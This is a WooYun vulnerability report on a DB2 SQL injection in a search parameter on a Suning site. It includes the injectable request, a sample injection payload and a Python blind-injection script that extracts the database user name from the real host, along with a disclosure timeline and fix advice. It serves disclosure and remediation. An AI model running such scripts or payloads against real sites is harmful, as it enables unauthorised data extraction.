苏宁某站点存在鸡肋DB2注射(附验证脚本)

编号92463
Urlhttp://www.wooyun.org/bug.php?action=view&id=92463
漏洞状态厂商已经确认
漏洞标题苏宁某站点存在鸡肋DB2注射(附验证脚本)
漏洞类型SQL注射漏洞
厂商江苏苏宁易购电子商务有限公司
白帽子lijiejie
提交日期2015-01-17 21:17:00
公开日期2015-03-03 21:18:00
修复时间(not set)
确认时间2015-01-18 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank2
厂商评级
厂商评rank5
漏洞简介
苏宁某站点参数过滤不完整,存在部分SQL注射风险。
因为from关键词被过滤了,是一个利用价值较低的鸡肋DB2注射点。
漏洞细节

注射点位于:

POST http://union.suning.com/aas/wap/ad/single-promotion!search.action?search=y
orderBy:4
orderType:1
ctx:/aas
queryDto.name:%' and 2*3=6 and '%'='
queryDto.catalog:


参数queryDto.name可注入。下图猜解user列的长度是8(证实存在user列)。

suning_db2_sqli_1.png


suning_db2_sqli_2.png


这个注射点鸡肋的原因是关键词from被过滤,而我未能找到很好的绕过方法。
DB2自身内置的函数不够强大,用于DOS攻击数据库服务器也有困难。
像MySQL中的sleep(),BENCHMARK(),MSSQL中waitfor delay,DB2却需要创建user function方可实现。
再者DB2也并不支持行内的注释(类似/**/),所以反复测试发现依然无法突破。。。

POC

知道user列的长度为8,试试猜解看看内容,得到:

[Done]user is 'b2caas  '


suning_db2_sqli_3.png


#encoding=gbk
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36',
'Referer': 'http://union.suning.com/aas/wap/ad/single-promotion!search.action?search=y',
'Cookie': '粘贴可用的cookie到此',
}
payloads = list('[email protected]_. ')
print 'start to retrive user:'
user = ''
for i in range(1, 9):
for payload in payloads:
conn = httplib.HTTPConnection('union.suning.com', timeout=60)
params = {
'orderBy': 4,
'queryDto.name': "%%' and ascii(substr(lower(user),%s,1))=%s and '%%'='" % (i, ord(payload)),
'orderType': 1,
'ctx': '/aas',
'queryDto.catalog': '',
}
aaaa = urllib.urlencode(params)
conn.request(method='POST',
url='/aas/wap/ad/single-promotion!search.action?search=y',
body = urllib.urlencode(params),
headers = headers)
html_doc = conn.getresponse().read().decode('utf-8')
conn.close()
print '.',
if html_doc.find(u'product/102548641.html') > 0: # True
user += payload
print '\n[In progress]', user
break
print '\n[Done]user is', repr(user)

修复方案

考虑增强参数过滤,例如过滤下ascii(),substr()
攻击者组合使用内置函数和系统模块,存在一定的本地文件读取和拒绝服务风险。
1=1这种表达式会被拦截,但1*2=2测试是可用的

状态信息 2015-01-17: 细节已通知厂商并且等待厂商处理中
2015-01-18: 厂商已经确认,细节仅向厂商公开
2015-01-28: 细节向核心白帽子及相关领域专家公开
2015-02-07: 细节向普通白帽子公开
2015-02-17: 细节向实习白帽子公开
2015-03-03: 细节向公众公开
厂商回复感谢提交。
回应信息危害等级:低漏洞Rank:5 确认时间:2015-01-18 11:07
Showing 1-7 of 7 items.
评论内容评论人点赞数评论时间

脚本每次大同小异的就不用再发了吧^。^

BeenQuiver02015-03-03 21:54:00

@zzR 哈哈,多谢zzR大神关注。 :)

lijiejie02015-01-18 15:49:00

李姐姐你的脚本盲注自动猜解么

泳少02015-01-18 00:24:00

@zzR 我已关注很久了,又看到久违的(附验证脚本),如果没有这个,绝对不是李姐姐发的!~~~哈哈

Ch4r0n02015-01-17 23:56:00

李姐姐,你再这样,我可要关注你了

残雪02015-01-17 23:23:00

@zzR 我以关注了

刘海哥02015-01-17 22:37:00

李姐姐,你再这样,我可要关注你了

zzR02015-01-17 21:47:00